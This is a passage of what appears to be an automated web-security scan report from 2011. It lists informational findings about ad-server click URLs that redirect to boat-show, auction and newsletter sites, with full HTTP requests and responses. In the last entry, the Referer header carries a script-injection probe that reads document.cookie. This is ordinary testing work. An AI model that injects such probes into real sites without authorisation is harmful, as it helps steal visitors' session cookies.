http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1443540246/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/7263485738303033424c73414270536c?x

The response contains the following link to another domain:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1443540246/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1462172569/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1462172569/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/7263485738303033424c73414270536c?x

The response contains the following link to another domain:

http://www.myonlinepubs.com/publication?i=59161

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1462172569/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:06:10 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.myonlinepubs.com/publication?i=59161
Content-Length: 324
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.myonlinepubs.com/publication?i=59161">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1663408298/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1663408298/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/7263485738303033424c73414270536c?x

The response contains the following link to another domain:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1663408298/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/167914676/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/167914676/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/7263485738303033424c73414270536c?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/167914676/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:06:13 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1790696998/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1790696998/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/7263485738303033424c73414270536c?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1790696998/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:06:05 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

17.215. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1813901630/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/7263485738303033424c73414270536c previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1813901630/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1813901630/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/7263485738303033424c73414270536c?x

The response contains the following link to another domain:

http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1813901630/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:05:57 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2021312465/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2021312465/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/7263485738303033424c73414270536c?x

The response contains the following link to another domain:

http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2021312465/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:06:16 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i=2039">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2141444174/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2141444174/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/7263485738303033424c73414270536c?x

The response contains the following link to another domain:

http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2141444174/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:05:59 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 300
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/328960883/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/328960883/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/7263485738303033424c73414270536c?x

The response contains the following link to another domain:

http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/328960883/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Fri, 28 Jan 2011 16:59:54 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

17.219. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/572126538/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/7263485738303033424c73414270536c previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/572126538/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/572126538/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/7263485738303033424c73414270536c?x

The response contains the following link to another domain:

http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/572126538/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Fri, 28 Jan 2011 16:59:57 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/589036194/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/589036194/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/7263485738303033424c73414270536c?x

The response contains the following link to another domain:

http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/589036194/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:06:27 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/672313137/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/672313137/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/7263485738303033424c73414270536c?x

The response contains the following link to another domain:

http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/672313137/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:05:56 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/677208420/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/677208420/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/7263485738303033424c73414270536c?x

The response contains the following link to another domain:

http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/677208420/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/788685001/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/788685001/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/7263485738303033424c73414270536c?x

The response contains the following link to another domain:

http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/788685001/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Fri, 28 Jan 2011 16:59:56 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i=2039">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/90261661/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/90261661/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/7263485738303033424c73414270536c?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/90261661/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Fri, 28 Jan 2011 16:59:51 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

17.225. http://oascentral.bostonherald.com/RealMedia/ads/adstream_mjx.ads/www.carfind.com/1222741686@Top1,Right1,Right2,Right3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.carfind.com/1222741686@Top1,Right1,Right2,Right3

Issue detail

The page was loaded from a URL containing a query string:

http://oascentral.bostonherald.com/RealMedia/ads/adstream_mjx.ads/www.carfind.com/1222741686@Top1,Right1,Right2,Right3?

The response contains the following links to other domains:

http://d3.zedo.com/jsc/d3/fo.js
http://imagec12.247realmedia.com/RealMedia/ads/Creatives/BostonHerald/HerbChambers_120x90/herbChambers120x90.gif
http://imagec12.247realmedia.com/RealMedia/ads/Creatives/BostonHerald/Quirk_Carfind_120x100_F2/carfind-tiny-ad.gif
http://imagec12.247realmedia.com/RealMedia/ads/Creatives/BostonHerald/Quirk_Carfind_468x60_F2/quirk468x60_Jan07.gif

Request

GET /RealMedia/ads/adstream_mjx.ads/www.carfind.com/1222741686@Top1,Right1,Right2,Right3? HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://boston30.autochooser.com/results.asp?6bfd0%3balert(document.cookie)//cb19586ae74=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; __qca=P0-1247593866-1296251843767; RMFD=011PiwJwO101yed8|O3021J3t|O3021J48|P3021J4T|P2021J4m; __utmz=235728274.1296308367.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/71; __utma=235728274.1370509941.1296251844.1296251844.1296308367.2; __utmc=235728274; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 14:24:52 GMT
